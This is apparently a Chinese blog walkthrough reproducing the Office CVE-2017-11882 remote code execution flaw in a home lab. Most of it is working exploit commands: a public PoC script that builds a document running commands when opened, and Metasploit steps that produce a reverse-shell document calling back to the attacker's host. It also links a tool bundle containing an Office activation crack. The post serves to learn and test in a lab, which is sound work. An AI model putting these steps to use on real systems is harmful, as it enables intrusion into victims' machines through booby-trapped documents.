Office远程代码执行漏洞(CVE-2017-11882)复现

1.今天看到有复现的文章,看了好几篇决定本地测试该漏洞

利用工具清单:

a) tcp反弹:kali 172.16.1.204

b) 安装office2013的系统:win7 172.16.253.4

1. Msf 用到的 Poc

2. office2013、激活工具

3. win7旗舰版ISO镜像

以上工具已经打包好,下载地址:

链接:http://pan.baidu.com/s/1o8635Om  密码:xl91

Microsoft Office再次爆出内存破坏漏洞,CVEID CVE-2017-11882,攻击者可以利用此问题,在当前登录用户的上下文中执行任意代码。失败的开发尝试可能会导致拒绝服务条件。

漏洞触发的原理http://www.freebuf.com/articles/web/155304.html

受影响版本包括,Office 2016、Office 2013、Office 2010、Office 2007的相关版本。

POC地址:https://github.com/Ridter/CVE-2017-11882/

分割符--------------------------------------------------------------------

上面都是废话,进入正题

1、简单的生成弹计算器的doc文件

命令:python Command43b_CVE-2017-11882.py -c "cmd.exe /c calc.exe" -o test.doc

生成的doc文件直接打开就可以弹出计算器了

Office远程代码执行漏洞(CVE-2017-11882)复现_第1张图片

2、生成可以反弹shell的doc文件

这首先下载metasploit的攻击模块

wget https://raw.githubusercontent.com/realoriginal/metasploit-framework/39a4d193a17c6f85846a58a429c0914f542bded2/modules/exploits/windows/fileformat/office_ms17_11882.rb

之后移动到下面这个目录

mv office_ms17_11882.rb /usr/share/metasploit-framework/modules/exploits/windows/fileformat

接着启动metasploit

输入

use exploit/windows/fileformat/office_ms17_11882

设置生成的文件名字

set filename bboysoul.doc

设置主机ip

set lhost 172.16.1.204

开始攻击

exploit

Office远程代码执行漏洞(CVE-2017-11882)复现_第2张图片

回连成功,shell


Office远程代码执行漏洞(CVE-2017-11882)复现_第3张图片

exit

你可能感兴趣的:(Office远程代码执行漏洞(CVE-2017-11882)复现)